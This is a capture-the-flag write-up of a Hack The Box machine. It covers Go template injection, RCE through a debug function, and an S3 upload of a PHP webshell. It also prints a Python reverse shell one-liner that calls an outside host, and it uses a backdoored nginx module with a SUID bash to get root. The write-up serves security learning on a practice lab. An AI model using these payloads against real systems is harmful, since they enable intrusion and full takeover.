Enumeration/Scanning With Nmap
We always start with an nmap scan…..
Nmap -sC -sV -oA nmap <Target-IP>
┌──(muzec㉿Muzec-Security)-[~/Documents/HTB/retired/10.10.11.113]
└─$ cat nmap.nmap
# Nmap 7.91 scan initiated Tue Sep 7 13:14:57 2021 as: nmap -sC -sV -oA nmap 10.10.11.113
Nmap scan report for 10.10.11.113
Host is up (0.78s latency).
Not shown: 994 closed ports
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.2p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 3072 d8:f5:ef:d2:d3:f9:8d:ad:c6:cf:24:85:94:26:ef:7a (RSA)
| 256 46:3d:6b:cb:a8:19:eb:6a:d0:68:86:94:86:73:e1:72 (ECDSA)
|_ 256 70:32:d7:e3:77:c1:4a:cf:47:2a:de:e5:08:7a:f8:7a (ED25519)
80/tcp open http nginx
|_http-title: Hacking eSports |
8080/tcp open http nginx
|_http-title: Hacking eSports | Home page
9000/tcp filtered cslistener
9001/tcp filtered tor-orport
9002/tcp filtered dynamid
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Tue Sep 7 13:17:49 2021 -- 1 IP address (1 host up) scanned in 171.57 seconds
We are having 3 open ports 22,80 and 8080 seems cool the rest is filtered now let go through the port 80 first which is the HTTP.
A nice homepage i will say lol checking robots.txt nothing but seems we have double index page which is index.html,index.php .
Index.html bring out a test page only when the index.php bring out the normal homepage i try bursting some directories but got nothing interesting now time to jump to the port 8080.
A Login page is it vulnerable to SQL Injection let give it a try but i spend sometime on the login page and i go nothing but checking the title of the login page i found something strange the title is looking like an SSTI (Server Side Template Injection) payload.
So i click on the forgot password page to test the page for SSTI vulnerability but knowing the template engine will help a lot so i try intercepting the request with Burp suite.
Nice checking the response and i can see X-Forwarded-Server: golang ahhh seems the server is written in Go i Know it running nginx also but the template engine is GO yes it the same now i quickly hit google to find some SSTI payload in GO.
Found some cool website that explain more in exploiting SSTI in Go SSTI In Go.
Send the request to repeater to try my payload i got Email Sent To: ssti nice a work in progress let dig more.
Ahhhh cool got some creds to log into the website but nothing interesting it just a source code.
Now trying To get RCE seems the DebugCmd function look interesting.
func (u User) DebugCmd (test string) string {
ipp := strings.Split(test, " ")
bin := strings.Join(ipp[:1], " ")
args := strings.Join(ipp[1:], " ")
if len(args) > 0{
out, _ := exec.Command(bin, args).CombinedOutput()
return string(out)
} else {
out, _ := exec.Command(bin).CombinedOutput()
return string(out)
}
}
It isn’t used anywhere else in the page, but it exists. Using Functions Inside Go Templates This post talks about how to reference objects (including functions) from the templating engine using a .function_name. Submitting `` returns proof of execution.
Boom we have RCE was stuck here for long man i keep trying to get a reverse shell back to my terminal but no luck i try diff reverse shell payloads but got nothing let try checking the hostname.
Aws Cool and seems we are in docker env also and the hostname give a clear hint that we are dealing with s3 bucket.
AWS Command
aws s3 ls // to see buckets
aws s3 ls s3://website
Ahhh seems the buckets is on port 80 nice now let try to upload a file on the target.
UPLOADING A FILE WITH THE RCE AND USING AWS To TRANSFER IT TO PORT 80
<?php echo system($_GET["cmd"]); ?>
┌──(muzec㉿Muzec-Security)-[~/Documents/HTB/retired/10.10.11.113]
└─$ cat shell.php | base64
PD9waHAgZWNobyBzeXN0ZW0oJF9HRVRbImNtZCJdKTsgPz4K
Let confirm if we have our file in the tmp dircetory.
Ahhh awesome we have it now let copy it to port 80 with aws.
aws s3 cp /tmp/rev s3://website/rev.php
Now let confirm it on port 80 which is the HTTP.
Boom a webshell now let get a reverse shell back to our terminal.
SHELL
python3 -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.0.0.1",1234));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'
Now let spawn a TTY shell.
python3 -c 'import pty; pty.spawn ("/bin/bash")'
Now let get the user.txt in the home directory of the user ubuntu .
Privilege Escalation
Ahhh the hard the part man i was stuck here for so long all thanks to my buddy c3p0d4y for the nudge i love you man so let hit it. The root part is pretty new to me like damn it was fun.
Kernal version but nothing thinking it vulnerable to overlayfs but it probably patched lol let check the ports that is running locally on the target.
www-data@gobox:~/html$ netstat -tulpn
netstat -tulpn
(Not all processes could be identified, non-owned process info
will not be shown, you would have to be root to see it all.)
Active Internet connections (only servers)
Proto Recv-Q Send-Q Local Address Foreign Address State PID/Program name
tcp 0 0 0.0.0.0:8080 0.0.0.0:* LISTEN -
tcp 0 0 0.0.0.0:80 0.0.0.0:* LISTEN -
tcp 0 0 127.0.0.53:53 0.0.0.0:* LISTEN -
tcp 0 0 0.0.0.0:22 0.0.0.0:* LISTEN -
tcp 0 0 0.0.0.0:4566 0.0.0.0:* LISTEN -
tcp 0 0 127.0.0.1:8000 0.0.0.0:* LISTEN -
tcp 0 0 0.0.0.0:9000 0.0.0.0:* LISTEN -
tcp 0 0 0.0.0.0:9001 0.0.0.0:* LISTEN -
tcp6 0 0 :::22 :::* LISTEN -
tcp6 0 0 :::9000 :::* LISTEN -
tcp6 0 0 :::9001 :::* LISTEN -
udp 0 0 127.0.0.53:53 0.0.0.0:* -
www-data@gobox:~/html$
We have some pretty strange ports and the hint i got was dig into /etc/nginx/modules-enabled thanks again c3p0d4y
50-backdoor.conf look strange let dig into it.
So i decided to know more about the module so it hit google to do some research on it.
The first one look promising let check it out.
The NginxExecute module executes the shell command through GET and POST to display the result.
Configuration example:
location ... {
......
command on;
}
worker_processes 2;
events {
worker_connections 1024;
}
http {
include mime.types;
default_type application/octet-stream;
sendfile on;
keepalive_timeout 65;
server {
listen 80;
server_name localhost;
location / {
root html;
index index.html index.htm;
command on;
}
error_page 500 502 503 504 /50x.html;
location = /50x.html {
root html;
}
}
}
Usage: view-source:http://192.168.18.22/?system.run[command] or curl -g "http://192.168.18.22/?system.run[command]" The command can be any system command. The command you will want to use depends on the permissions that nginx runs with.
view-source:http://192.168.18.22/?system.run[ifconfig]
Let locate the module on the target.
But when i try it i got failed.
So i decided to strings the module.
ippsec.run
Now let try it again.
Boom that is some good sh*t lol now let get the flag.
We have the root flag but man that is not fun without a real root shell lol.
www-data@gobox:/usr/lib/nginx/modules$ curl -g "http://127.0.0.1:8000/?ippsec.run[chmod 777 /tmp/bash]"
<://127.0.0.1:8000/?ippsec.run[chmod 777 /tmp/bash]"
curl: (52) Empty reply from server
www-data@gobox:/usr/lib/nginx/modules$ ls /tmp/bash
ls /tmp/bash
/tmp/bash
www-data@gobox:/usr/lib/nginx/modules$ /tmp/bash -p
/tmp/bash -p
www-data@gobox:/usr/lib/nginx/modules$ ls -la /tmp/bash
ls -la /tmp/bash
-rwxrwxrwx 1 root root 1183448 Sep 8 17:16 /tmp/bash
www-data@gobox:/usr/lib/nginx/modules$ /tmp/bash -p
/tmp/bash -p
www-data@gobox:/usr/lib/nginx/modules$ id
id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
www-data@gobox:/usr/lib/nginx/modules$ curl 'http://127.0.0.1:8000?ippsec.run[chmod%204777%20%2ftmp%2fbash]'
<.0.1:8000?ippsec.run[chmod%204777%20%2ftmp%2fbash]'
curl: (52) Empty reply from server
www-data@gobox:/usr/lib/nginx/modules$ /tmp/bash -p
/tmp/bash -p
bash-5.0# id
id
uid=33(www-data) gid=33(www-data) euid=0(root) groups=33(www-data)
bash-5.0# cd /root
cd /root
bash-5.0# ls
ls
iptables.sh root.txt snap
bash-5.0#
With some trial and error i got it and we are done.
Greeting From Muzec